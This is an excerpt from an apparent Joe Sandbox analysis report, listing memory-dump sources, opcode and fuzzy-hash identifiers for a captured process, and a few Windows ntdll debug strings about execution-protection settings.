                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 0891782ced91eb134c319edf1d3c023917face5a437ef4c1dc91b5cc4ea59059
                                                                                                                                                                                                                                                                                  • Instruction ID: 1184b4bbfb08e734c258f57d538e2e4ba413e4c273524a2e78420a944c3e9d47
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0891782ced91eb134c319edf1d3c023917face5a437ef4c1dc91b5cc4ea59059
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 65F052B1115284CFCF29E39CC04CB2173E4AB01664F098C21C40787941C624CE80E280
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                                                                                                                                                                                                                  • Instruction ID: 466109c47f7ded62819fbc57e99c6ec5e15f3cac4c8fbc8a8e11d974aa0ff755
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2ed3d22eeff636eb0551a0025a211ec4f1b1c67496731614af6a82ea339e5be1
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FAE092727405412BD7119E598CD8F477B9EEFD2714F040879B9045E142CAE69D0992A0
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 29be543b92618aa32fb441b13d0ed74da2e9df99f383687be14e3f0d2c55fe97
                                                                                                                                                                                                                                                                                  • Instruction ID: a758c68409ebea3e46ac93a3d602ff6c1cf1a70f78b9e46001c9166f1a71fe8b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29be543b92618aa32fb441b13d0ed74da2e9df99f383687be14e3f0d2c55fe97
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 81F082B1B00249ABDB04DBE8D94AA5EBBB8EF08708F540499F502EB280DD74D9409729
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: bc689cd6628b2ad601f529c39872e63a7a36ccc354835a06be7b796d95e728d7
                                                                                                                                                                                                                                                                                  • Instruction ID: b0ce55c7a977f7368b61af0f39327caa279667754a4a4359f723fceb02041000
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc689cd6628b2ad601f529c39872e63a7a36ccc354835a06be7b796d95e728d7
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59F08275A04249ABDB04DBA8D94AA5EBBB8AF08708F000499F602EB281DA74D900D768
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 5259a64f0d43843facbf69c361050490ca3d8e662594583cdae4e7cecdc8d705
                                                                                                                                                                                                                                                                                  • Instruction ID: cf3d71dd2c6e635c290b467745fba3e97624563503cca579cae75a09c7bfb824
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5259a64f0d43843facbf69c361050490ca3d8e662594583cdae4e7cecdc8d705
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C5F0E231D156548FCF24D729C088F31B3D5FB40674F0D9861DE19C7901C3B4DA40C2A0
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: b791057a32afe85e8936a5233a0d9971e4c132c3884011bb6e17e7880981a41b
                                                                                                                                                                                                                                                                                  • Instruction ID: b6a8ff770b897779884ddc9d761acf7bdd2af247a01422d647f12af1d026e925
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b791057a32afe85e8936a5233a0d9971e4c132c3884011bb6e17e7880981a41b
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 38E09277B018236BD2119A18AC05F66B7AEEBE4650F090876F504C7214DA28DD02C7E0
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
Memory Dump Source
• Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 89b79f6f66cbf5186f0e884718d3cf990ded24a090c483d82bd84af94ae08494
                                                                                                                                                                                                                                                                                  • Instruction ID: b81dcf0dff84e4ee4caf53c370f882a791a7dfe2557ffdc021aa583a6b1dcecb
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89b79f6f66cbf5186f0e884718d3cf990ded24a090c483d82bd84af94ae08494
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2E0D8322006549BC721FB18DC89F9BBB9AEF90365F004915F116575A0CB30EE10E7C4
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                                                                                                                                                                                                                  • Instruction ID: a280ad4e260c1b500fb6d5c01f68412a18ce67380f0bd4fe5be935da9678caaa
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 114db9202c54257abf2526529968dd102c67066819c003b1d4cdd2b3c6882db7
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 10E0C232240565EFDB316B61DC08F627AA6FF40B24F300D6AF486068A48BB49CC1EB4C
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                                                                                                                                                                                                                  • Instruction ID: cd6abb1278853719972c1ac024e6dc6bfc9db4ff8ed6d431e242acdf6c6e97ce
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c583dce7c6f581c5b0a3768414c357600350311837f1921a9e10f15296612cb1
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1CD05E32251A50AACB3A2F14ED0DF927AB5EF40F24F050D28B146168F0C6A1ED84E695
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                                                                                                                                                                                                                  • Instruction ID: b1763b86062c85b2d91247983d442169708443eca961d556c5e6ceea6f55edba
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 52e1c536986b7be52acab18f0f65ce6b57b56a1f95f795bf6ae5db3b9db2cf4f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03E08C35A406849FCB12EB49C684F5AB7B9BB80B80F180804A1099F660D224EA00DB40
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                                                                                                                                                                                                                  • Instruction ID: 19b7e5a8719738cd1080d845642a35464896539718389c6405029ace59bc2619
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5a3d40c4745f6345f33bf01183ce61f2c0162c83d53e40109a16f3db65756406
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37D0A932204650ABC732AA1CFC00FD373E9BB8CB21F020859B108C7050C3A4EC81D680
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
Strings
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 05CD4460
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 05CD4507
• CLIENT(ntdll): Processing section info %ws..., xrefs: 05CD4592
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 05CD4530
• Execute=1, xrefs: 05CD451E
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 05CD454D
• ExecuteOptions, xrefs: 05CD44AB